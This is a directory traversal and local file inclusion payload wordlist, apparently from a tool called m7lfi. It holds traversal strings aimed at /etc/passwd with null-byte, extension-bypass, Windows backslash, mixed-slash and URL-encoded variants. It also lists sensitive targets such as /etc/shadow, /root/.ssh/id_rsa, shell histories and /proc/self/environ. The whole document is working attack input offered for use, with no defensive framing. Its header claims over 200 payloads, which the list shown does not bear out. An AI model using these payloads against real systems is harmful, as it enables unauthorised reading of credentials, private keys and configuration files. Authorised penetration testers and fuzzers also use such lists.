# m7lfi - Directory Traversal Payloads
# Milkyway Intelligence | Sharlix
# 200+ payloads across multiple categories

../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd

# Null byte variants
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00

# Extension bypass
../etc/passwd%00.jpg
../../etc/passwd%00.jpg
../../../etc/passwd%00.jpg
../etc/passwd%00.php
../etc/passwd.

# Backslash (Windows / IIS)
..\etc\passwd
..\..\etc\passwd
..\..\..\etc\passwd
..\windows\win.ini
..\..\windows\win.ini
..\..\..\windows\win.ini

# Mixed slash
../\../\../\etc/passwd
..\/../\../etc/passwd

# Repetitive traversal
....//....//etc/passwd
....//....//....//etc/passwd
....\/....\/etc/passwd
..././..././etc/passwd
..%2f..%2fetc%2fpasswd
..%2F..%2Fetc%2Fpasswd
..%5c..%5cetc%5cpasswd

# From root
/etc/passwd
/etc/shadow
/etc/hosts
/etc/group
/etc/hostname
/etc/resolv.conf
/etc/os-release
/etc/issue
/etc/motd
/etc/crontab
/etc/fstab
/etc/sudoers
/etc/apt/sources.list
/etc/mysql/my.cnf
/etc/php/php.ini
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/ssh/sshd_config
/root/.bash_history
/root/.ssh/id_rsa
/home/www/.bash_history
/home/ubuntu/.bash_history
/var/mail/root
/var/spool/cron/root
/proc/self/environ
/proc/self/cmdline
/proc/version
/proc/net/tcp
/proc/mounts
